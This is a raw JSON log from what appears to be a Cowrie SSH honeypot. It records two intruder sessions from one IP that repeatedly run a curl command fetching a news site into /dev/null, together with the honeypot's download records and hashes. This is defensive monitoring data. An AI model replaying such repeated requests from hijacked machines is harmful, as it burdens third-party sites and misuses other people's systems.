{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.928252Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.952209Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.955466Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.959594Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:06.960727Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.962722Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:06.984822Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.986070Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.993471Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:07.003915Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.005082Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.010451Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:07.032722Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.033996Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.037822Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:07.056395Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.057650Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.061403Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:07.075081Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.076416Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.094718Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:07.097335Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.098839Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:07.115788Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.116914Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.125562Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.127600Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.136836Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:07.139086Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.140556Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:07.159353Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.160963Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.181245Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:07.182713Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.184043Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:07.196671Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.197862Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.220025Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:07.224080Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.225407Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:07.232868Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.234465Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.239473Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.246987Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.253889Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.259338Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:07.267173Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.268731Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.272319Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:07.273484Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.275072Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:07.308196Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.309546Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:07.312616Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.313921Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.345702Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.347792Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:07.349838Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.352470Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:07.357039Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.358392Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.375597Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:07.398204Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.399733Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:07.403494Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.404869Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.408382Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.414484Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:07.443303Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.444413Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:07.448570Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.450495Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.464893Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.481206Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:07.482622Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.483627Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:07.491032Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.492128Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.495854Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.497788Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:07.520705Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.522376Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:07.529137Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.530279Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:07.561441Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.563015Z","src_ip":"212.227.125.160","session":"7541ed730449"}
